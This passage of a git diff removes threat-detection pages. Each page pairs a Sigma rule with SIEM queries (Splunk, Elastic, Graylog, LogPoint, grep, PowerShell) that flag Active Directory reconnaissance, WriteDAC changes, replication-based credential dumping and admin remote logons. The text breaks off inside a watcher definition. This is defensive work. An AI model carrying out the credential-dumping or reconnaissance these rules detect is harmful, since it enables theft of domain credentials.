-| **References**           | <ul><li>[https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html](https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html)</li></ul>  |
-| **Author**               | Samir Bousseaden |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: AD Privileged Users or Groups Reconnaissance
-id: 35ba1d85-724d-42a3-889f-2e2362bcaf23
-description: Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs
-references:
-    - https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html
-tags:
-    - attack.discovery
-    - attack.t1087
-status: experimental
-author: Samir Bousseaden
-date: 2019/04/03
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: enable Object Access SAM on your Domain Controllers'
-detection:
-    selection:
-        EventID: 4661
-        ObjectType:
-        - 'SAM_USER'
-        - 'SAM_GROUP'
-        ObjectName:
-         - '*-512'
-         - '*-502'
-         - '*-500'
-         - '*-505'
-         - '*-519'
-         - '*-520'
-         - '*-544'
-         - '*-551'
-         - '*-555'
-         - '*admin*'
-    condition: selection
-falsepositives:
-    - if source account name is not an admin then its super suspicious
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4661" -and ($_.message -match "SAM_USER" -or $_.message -match "SAM_GROUP") -and ($_.message -match "ObjectName.*.*-512" -or $_.message -match "ObjectName.*.*-502" -or $_.message -match "ObjectName.*.*-500" -or $_.message -match "ObjectName.*.*-505" -or $_.message -match "ObjectName.*.*-519" -or $_.message -match "ObjectName.*.*-520" -or $_.message -match "ObjectName.*.*-544" -or $_.message -match "ObjectName.*.*-551" -or $_.message -match "ObjectName.*.*-555" -or $_.message -match "ObjectName.*.*admin.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4661" AND winlog.event_data.ObjectType:("SAM_USER" OR "SAM_GROUP") AND winlog.event_data.ObjectName.keyword:(*\-512 OR *\-502 OR *\-500 OR *\-505 OR *\-519 OR *\-520 OR *\-544 OR *\-551 OR *\-555 OR *admin*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/35ba1d85-724d-42a3-889f-2e2362bcaf23 <<EOF
-{
-  "metadata": {
-    "title": "AD Privileged Users or Groups Reconnaissance",
-    "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs",
-    "tags": [
-      "attack.discovery",
-      "attack.t1087"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4661\" AND winlog.event_data.ObjectType:(\"SAM_USER\" OR \"SAM_GROUP\") AND winlog.event_data.ObjectName.keyword:(*\\-512 OR *\\-502 OR *\\-500 OR *\\-505 OR *\\-519 OR *\\-520 OR *\\-544 OR *\\-551 OR *\\-555 OR *admin*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4661\" AND winlog.event_data.ObjectType:(\"SAM_USER\" OR \"SAM_GROUP\") AND winlog.event_data.ObjectName.keyword:(*\\-512 OR *\\-502 OR *\\-500 OR *\\-505 OR *\\-519 OR *\\-520 OR *\\-544 OR *\\-551 OR *\\-555 OR *admin*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'AD Privileged Users or Groups Reconnaissance'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4661" AND ObjectType:("SAM_USER" "SAM_GROUP") AND ObjectName.keyword:(*\-512 *\-502 *\-500 *\-505 *\-519 *\-520 *\-544 *\-551 *\-555 *admin*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4661" (ObjectType="SAM_USER" OR ObjectType="SAM_GROUP") (ObjectName="*-512" OR ObjectName="*-502" OR ObjectName="*-500" OR ObjectName="*-505" OR ObjectName="*-519" OR ObjectName="*-520" OR ObjectName="*-544" OR ObjectName="*-551" OR ObjectName="*-555" OR ObjectName="*admin*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4661" ObjectType IN ["SAM_USER", "SAM_GROUP"] ObjectName IN ["*-512", "*-502", "*-500", "*-505", "*-519", "*-520", "*-544", "*-551", "*-555", "*admin*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4661)(?=.*(?:.*SAM_USER|.*SAM_GROUP))(?=.*(?:.*.*-512|.*.*-502|.*.*-500|.*.*-505|.*.*-519|.*.*-520|.*.*-544|.*.*-551|.*.*-555|.*.*admin.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_ad_object_writedac_access.md b/Atomic_Threat_Coverage/Detection_Rules/win_ad_object_writedac_access.md
deleted file mode 100644
index f6454c8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_ad_object_writedac_access.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | AD Object WriteDAC Access       |
-|:-------------------------|:------------------|
-| **Description**          | Detects WRITE_DAC access to a domain object |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1222: File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/05_defense_evasion/T1222_file_permissions_modification/ad_replication_user_backdoor.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/05_defense_evasion/T1222_file_permissions_modification/ad_replication_user_backdoor.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: AD Object WriteDAC Access
-id: 028c7842-4243-41cd-be6f-12f3cf1a26c7
-description: Detects WRITE_DAC access to a domain object
-status: experimental
-date: 2019/09/12
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/05_defense_evasion/T1222_file_permissions_modification/ad_replication_user_backdoor.md
-tags:
-    - attack.defense_evasion
-    - attack.t1222
-logsource:
-    product: windows
-    service: security
-detection:
-    selection: 
-        EventID: 4662
-        ObjectServer: 'DS'
-        AccessMask: '0x40000'
-        ObjectType:
-            - '19195a5b-6da0-11d0-afd3-00c04fd930c9'
-            - 'domainDNS'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4662" -and $_.message -match "ObjectServer.*DS" -and $_.message -match "AccessMask.*0x40000" -and ($_.message -match "19195a5b-6da0-11d0-afd3-00c04fd930c9" -or $_.message -match "domainDNS")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4662" AND ObjectServer:"DS" AND winlog.event_data.AccessMask:"0x40000" AND winlog.event_data.ObjectType:("19195a5b\-6da0\-11d0\-afd3\-00c04fd930c9" OR "domainDNS"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/028c7842-4243-41cd-be6f-12f3cf1a26c7 <<EOF
-{
-  "metadata": {
-    "title": "AD Object WriteDAC Access",
-    "description": "Detects WRITE_DAC access to a domain object",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1222"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4662\" AND ObjectServer:\"DS\" AND winlog.event_data.AccessMask:\"0x40000\" AND winlog.event_data.ObjectType:(\"19195a5b\\-6da0\\-11d0\\-afd3\\-00c04fd930c9\" OR \"domainDNS\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4662\" AND ObjectServer:\"DS\" AND winlog.event_data.AccessMask:\"0x40000\" AND winlog.event_data.ObjectType:(\"19195a5b\\-6da0\\-11d0\\-afd3\\-00c04fd930c9\" OR \"domainDNS\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'AD Object WriteDAC Access'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4662" AND ObjectServer:"DS" AND AccessMask:"0x40000" AND ObjectType:("19195a5b\-6da0\-11d0\-afd3\-00c04fd930c9" "domainDNS"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4662" ObjectServer="DS" AccessMask="0x40000" (ObjectType="19195a5b-6da0-11d0-afd3-00c04fd930c9" OR ObjectType="domainDNS"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4662" ObjectServer="DS" AccessMask="0x40000" ObjectType IN ["19195a5b-6da0-11d0-afd3-00c04fd930c9", "domainDNS"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4662)(?=.*DS)(?=.*0x40000)(?=.*(?:.*19195a5b-6da0-11d0-afd3-00c04fd930c9|.*domainDNS)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_ad_replication_non_machine_account.md b/Atomic_Threat_Coverage/Detection_Rules/win_ad_replication_non_machine_account.md
deleted file mode 100644
index 39e7af0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_ad_replication_non_machine_account.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Active Directory Replication from Non Machine Account       |
-|:-------------------------|:------------------|
-| **Description**          | Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/ad_replication_non_machine_account.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/ad_replication_non_machine_account.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Active Directory Replication from Non Machine Account
-id: 17d619c1-e020-4347-957e-1d1207455c93
-description: Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.
-status: experimental
-date: 2019/07/26
-modified: 2020/03/02
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/ad_replication_non_machine_account.md
-tags:
-    - attack.credential_access
-    - attack.t1003
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4662
-        AccessMask: '0x100'
-        Properties|contains:
-            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
-            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
-            - '89e95b76-444d-4c62-991a-0facbeda640c'
-    filter:
-        - SubjectUserName|endswith: '$'
-        - SubjectUserName|startswith: 'MSOL_' #https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account
-    condition: selection and not filter
-fields:
-    - ComputerName
-    - SubjectDomainName
-    - SubjectUserName
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4662" -and $_.message -match "AccessMask.*0x100" -and ($_.message -match "Properties.*.*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2.*" -or $_.message -match "Properties.*.*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2.*" -or $_.message -match "Properties.*.*89e95b76-444d-4c62-991a-0facbeda640c.*")) -and  -not ($_.message -match "SubjectUserName.*.*$" -or $_.message -match "SubjectUserName.*MSOL_.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"4662" AND winlog.event_data.AccessMask:"0x100" AND winlog.event_data.Properties.keyword:(*1131f6aa\-9c07\-11d1\-f79f\-00c04fc2dcd2* OR *1131f6ad\-9c07\-11d1\-f79f\-00c04fc2dcd2* OR *89e95b76\-444d\-4c62\-991a\-0facbeda640c*)) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$ OR winlog.event_data.SubjectUserName.keyword:MSOL_*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/17d619c1-e020-4347-957e-1d1207455c93 <<EOF
-{
-  "metadata": {
-    "title": "Active Directory Replication from Non Machine Account",
-    "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4662\" AND winlog.event_data.AccessMask:\"0x100\" AND winlog.event_data.Properties.keyword:(*1131f6aa\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2* OR *1131f6ad\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2* OR *89e95b76\\-444d\\-4c62\\-991a\\-0facbeda640c*)) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$ OR winlog.event_data.SubjectUserName.keyword:MSOL_*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4662\" AND winlog.event_data.AccessMask:\"0x100\" AND winlog.event_data.Properties.keyword:(*1131f6aa\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2* OR *1131f6ad\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2* OR *89e95b76\\-444d\\-4c62\\-991a\\-0facbeda640c*)) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$ OR winlog.event_data.SubjectUserName.keyword:MSOL_*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Active Directory Replication from Non Machine Account'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n     ComputerName = {{_source.ComputerName}}\nSubjectDomainName = {{_source.SubjectDomainName}}\n  SubjectUserName = {{_source.SubjectUserName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4662" AND AccessMask:"0x100" AND Properties.keyword:(*1131f6aa\-9c07\-11d1\-f79f\-00c04fc2dcd2* *1131f6ad\-9c07\-11d1\-f79f\-00c04fc2dcd2* *89e95b76\-444d\-4c62\-991a\-0facbeda640c*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4662" AccessMask="0x100" (Properties="*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*" OR Properties="*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*" OR Properties="*89e95b76-444d-4c62-991a-0facbeda640c*")) NOT (SubjectUserName="*$" OR SubjectUserName="MSOL_*")) | table ComputerName,SubjectDomainName,SubjectUserName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="4662" AccessMask="0x100" Properties IN ["*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*", "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*", "*89e95b76-444d-4c62-991a-0facbeda640c*"])  -(SubjectUserName="*$" OR SubjectUserName="MSOL_*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*4662)(?=.*0x100)(?=.*(?:.*.*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2.*|.*.*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2.*|.*.*89e95b76-444d-4c62-991a-0facbeda640c.*))))(?=.*(?!.*(?:.*(?:.*(?=.*.*\$)|.*(?=.*MSOL_.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_ad_user_enumeration.md b/Atomic_Threat_Coverage/Detection_Rules/win_ad_user_enumeration.md
deleted file mode 100644
index 6cb49ba..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_ad_user_enumeration.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | AD User Enumeration       |
-|:-------------------------|:------------------|
-| **Description**          | Detects access to a domain user from a non-machine account |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrators configuring new users.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf](https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)</li><li>[http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html](http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html)</li><li>[https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all](https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all)</li></ul>  |
-| **Author**               | Maxime Thiebaut (@0xThiebaut) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: AD User Enumeration
-id: ab6bffca-beff-4baa-af11-6733f296d57a
-description: Detects access to a domain user from a non-machine account
-status: experimental
-date: 2020/03/30
-author: Maxime Thiebaut (@0xThiebaut)
-references:
-    - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
-    - http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html
-    - https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties
-tags:
-    - attack.discovery
-    - attack.t1087
-logsource:
-    product: windows
-    service: security
-    definition: Requires the "Read all properties" permission on the user object to be audited for the "Everyone" principal
-detection:
-    selection:
-        EventID: 4662
-        ObjectType|contains: # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}"
-            - 'bf967aba-0de6-11d0-a285-00aa003049e2' # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user)
-    filter:
-        - SubjectUserName|endswith: '$' # Exclude machine accounts
-        - SubjectUserName|startswith: 'MSOL_' # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account
-    condition: selection and not filter
-falsepositives:
-    - Administrators configuring new users.
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4662" -and ($_.message -match "ObjectType.*.*bf967aba-0de6-11d0-a285-00aa003049e2.*")) -and  -not ($_.message -match "SubjectUserName.*.*$" -or $_.message -match "SubjectUserName.*MSOL_.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"4662" AND winlog.event_data.ObjectType.keyword:(*bf967aba\-0de6\-11d0\-a285\-00aa003049e2*)) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$ OR winlog.event_data.SubjectUserName.keyword:MSOL_*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ab6bffca-beff-4baa-af11-6733f296d57a <<EOF
-{
-  "metadata": {
-    "title": "AD User Enumeration",
-    "description": "Detects access to a domain user from a non-machine account",
-    "tags": [
-      "attack.discovery",
-      "attack.t1087"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4662\" AND winlog.event_data.ObjectType.keyword:(*bf967aba\\-0de6\\-11d0\\-a285\\-00aa003049e2*)) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$ OR winlog.event_data.SubjectUserName.keyword:MSOL_*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4662\" AND winlog.event_data.ObjectType.keyword:(*bf967aba\\-0de6\\-11d0\\-a285\\-00aa003049e2*)) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$ OR winlog.event_data.SubjectUserName.keyword:MSOL_*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'AD User Enumeration'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4662" AND ObjectType.keyword:(*bf967aba\-0de6\-11d0\-a285\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4662" (ObjectType="*bf967aba-0de6-11d0-a285-00aa003049e2*")) NOT (SubjectUserName="*$" OR SubjectUserName="MSOL_*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="4662" ObjectType IN ["*bf967aba-0de6-11d0-a285-00aa003049e2*"])  -(SubjectUserName="*$" OR SubjectUserName="MSOL_*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*4662)(?=.*(?:.*.*bf967aba-0de6-11d0-a285-00aa003049e2.*))))(?=.*(?!.*(?:.*(?:.*(?=.*.*\$)|.*(?=.*MSOL_.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_admin_rdp_login.md b/Atomic_Threat_Coverage/Detection_Rules/win_admin_rdp_login.md
deleted file mode 100644
index 758b786..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_admin_rdp_login.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | Admin User Remote Logon       |
-|:-------------------------|:------------------|
-| **Description**          | Detect remote login by Administrator user depending on internal pattern |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1078: Valid Accounts](https://attack.mitre.org/techniques/T1078)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate administrative activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://car.mitre.org/wiki/CAR-2016-04-005](https://car.mitre.org/wiki/CAR-2016-04-005)</li></ul>  |
-| **Author**               | juju4 |
-| Other Tags           | <ul><li>car.2016-04-005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Admin User Remote Logon
-id: 0f63e1ef-1eb9-4226-9d54-8927ca08520a
-description: Detect remote login by Administrator user depending on internal pattern
-references:
-    - https://car.mitre.org/wiki/CAR-2016-04-005
-tags:
-    - attack.lateral_movement
-    - attack.t1078
-    - car.2016-04-005
-status: experimental
-author: juju4
-date: 2017/10/29
-logsource:
-    product: windows
-    service: security
-    definition: 'Requirements: Identifiable administrators usernames (pattern or special unique character. ex: "Admin-*"), internal policy mandating use only as secondary account'
-detection:
-    selection:
-        EventID: 4624
-        LogonType: 10
-        AuthenticationPackageName: Negotiate
-        AccountName: 'Admin-*'
-    condition: selection
-falsepositives:
-    - Legitimate administrative activity
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4624" -and $_.message -match "LogonType.*10" -and $_.message -match "AuthenticationPackageName.*Negotiate" -and $_.message -match "AccountName.*Admin-.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4624" AND winlog.event_data.LogonType:"10" AND winlog.event_data.AuthenticationPackageName:"Negotiate" AND winlog.event_data.AccountName.keyword:Admin\-*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0f63e1ef-1eb9-4226-9d54-8927ca08520a <<EOF
-{
-  "metadata": {
-    "title": "Admin User Remote Logon",
-    "description": "Detect remote login by Administrator user depending on internal pattern",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1078",
-      "car.2016-04-005"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.LogonType:\"10\" AND winlog.event_data.AuthenticationPackageName:\"Negotiate\" AND winlog.event_data.AccountName.keyword:Admin\\-*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4624\" AND winlog.event_data.LogonType:\"10\" AND winlog.event_data.AuthenticationPackageName:\"Negotiate\" AND winlog.event_data.AccountName.keyword:Admin\\-*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
